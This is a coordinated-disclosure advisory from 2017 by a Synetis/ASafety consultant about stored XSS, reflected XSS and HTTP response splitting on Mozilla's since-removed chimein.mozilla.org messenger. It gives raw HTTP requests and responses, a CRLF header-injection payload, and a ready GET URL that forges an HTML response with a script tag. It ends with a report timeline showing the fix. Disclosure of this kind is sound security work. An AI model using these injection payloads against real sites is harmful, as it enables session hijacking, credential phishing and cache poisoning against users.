######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################

Mozilla description :
======================================================================
 
Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products, 
thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla
Foundation and its tax-paying subsidiary, the Mozilla Corporation.

Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system, 
Bugzilla bug tracking system and other projects.


Vulnerabilities description :
======================================================================

The Chimein.mozilla.org sub-domain (access via HTTPS) provides a secure web messenger application. This application needs autrhentication.
Each user is authenticated with a "login / password". Then, to sent message to other user, a public/private key is used to encrypt and sign message.
The private key is protected via a passphrase.

This secure web messenger application contains several vulnerabilities :

- A stored XSS is available in the body of each message sent encrypted to other users.
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password. 

- A reflected XSS is available in the sign up process (login).
Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla's users credentials such key/password.

- A HTTP Response Splitting is available in the "/message/get" endpoint.
This vulnerability can be used to create Reflected XSS.


Proof of Concept ndeg1 : Stored Cross-Site Scripting
======================================================================
 
The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymetric encryption (public key, 
private key, password and passphrase) to add a strong security for message exchange.

A simple user can create an account, log in with this account, and send encrypted message (with passphrase) to any other user registered.
There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message. A user will be able to create an account as describe here :

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png

Login = ycam, password = ycam, passphrase = ycam

Then, once logged in, the user can sent an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept) :

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png

The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted.
Once sent, the message is visible for the receiver logged. When this victim-user clic on the message, he has to enter the passphrase used at encryption time.

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png

When the passphrase is indicated, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)).

https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookie or credential. Through XSS, an attacker 
can tamper with page rendering, take the control of the full browser and can use browser's exploits to gain privilege on local system (especially with dedicated 
framework for XSS flaw like BeEF : http://beefproject.com/).

This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11.

In this case, the main Stored-XSS is embeded in a personal message didacted to a victim (the victim needs to enter the passphrase to decrypt the message's body and 
trigger the payload). This is a serious issue because the XSS is located in a very secure chat system with asymetric encryption used.
An attacker will be able to create fake page, fake prompt, fake "re-authentication" process to steal victim's password. If the attacker gains access to a victim's 
account, he can used all the feature of the secure chat in place of the legitimate user.

PoC - HTTP request sample (with encrypted payload) :

POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close

login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&


Proof of Concept ndeg2 : Reflected Cross-Site Scripting
======================================================================

There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up) :

Payload injection :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png

Reflected XSS fired :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png


Proof of Concept ndeg3 : HTTP Response Splitting leverage to Reflected XSS
======================================================================

Exchange requests are made through API call, for example when a user POST a message, it's the "/message/create" entry point which is called. 
To list message "/message/list",  and to consult a specific message the following request is made (as example, the message ID  : 57 owned by 
the user ycam with password ycam used as Proof of Concept) :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The resulting data are like (JSON) :

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close

{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" in POST param of the initial request, the following error is retrieved :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received :

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot : 
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

There is a reflection of the "id" value in the HTTP headers returned by the server.

With the sequence %0a%0d (\r\n), an attacker can forge headers and responses content himself :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response :

HTTP/1.1 500 message xxx
yyy
zzz
 does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html) 
and arbitrary source code. Plus, the payload can be sent directly in GET param or in POST param. In GET, the vulnerability is more easy 
to sent to victims :

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d<html><body><script>alert(document.domain)</script></body></html><!--

Or hidden with the url-shortener bit.ly :

https://mzl.la/2eypf8b

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png

Tested successfully with the latest Firefox version 49.0.2.

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to 
properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and 
similar exploits.

Screenshots :
======================================================================

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png

- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png
- https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_006.png


Solution:
======================================================================

Fixed by Mozilla security team.
DNS entry "chimein.mozilla.org" deleted
 
 
Additional resources / article and screenshots :
======================================================================

- https://www.mozilla.org
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311883
- https://bugzilla.mozilla.org/show_bug.cgi?id=1311887
- https://bugzilla.mozilla.org/show_bug.cgi?id=1312034
- https://www.mozilla.org/en-US/security/bug-bounty/web-hall-of-fame/
- http://www.asafety.fr
- http://www.synetis.com
- https://www.asafety.fr/vuln-exploit-poc/contribution-mozilla-http-response-splitting-reflected-stored-xss/

 
Report timeline :
======================================================================
 
2016-10-20 : Mozilla security team alerted with details and PoC (via 2 BugZilla submissions)
2016-10-21 : Mozilla response and fix issues via DNS entry deletion.
2016-10-21 : Mozilla acknowledgement (out of scope for the Bug Bounty, but eligible to some goodies)
2017-04-03 : Mozilla acknowledgement on Mozilla Web and Services Hall of Fame (2016Q4)
2017-04-04 : Public advisory

Credits :
======================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr